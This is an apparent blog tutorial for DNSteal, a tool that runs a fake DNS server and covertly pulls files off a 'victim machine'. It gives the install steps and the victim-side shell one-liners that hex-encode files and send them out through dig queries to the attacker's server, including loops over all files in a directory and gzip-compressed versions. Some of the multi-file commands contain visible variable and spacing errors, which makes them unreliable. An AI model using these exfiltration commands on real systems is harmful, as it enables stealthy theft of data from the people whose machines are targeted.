DNSteal header

data exfiltration – DNSteal

download

Dnsteal is a Data Exfiltration Tool Through DNS Requests for stealthily sending files over DNS requests. Once setup and run successfully it acts as a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Install & start server
git clone https://github.com/dutchcoin/dnsteal.git /opt/dnsteal
Git clone printscreen

cd /opt/dnsteal && python dnsteal.py
DNSteal running

Transfer file from the victim
On the victim machine, you simply can do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
[000001]

On the server side you will see the file transfer start:
[000003]
When the transfer is finished you must stop the server with CTRL-C to save the file and view the md5sum
You can verify the md5sum on the victims machine by running
md5sum filename

Features:

Support for multiple files
Dnstool supports multiple files to be exfiltereted. Use as below.
for filename in $(ls); do for b in $(xxd -p $f); do dig +short@server %b.$filename.com; done; done
gzip compression supported

It also supports compression of the file to allow for faster transfer speeds, this can be achieved using the “-z” switch:
python dnsteal.py 127.0.0.1 –z

Then on the victim machine send a Gzipped file like below:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done

For multiple, gzip compressed files use as below:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server %b.$filename.com; done; done

FacebookTwitterGoogle+Share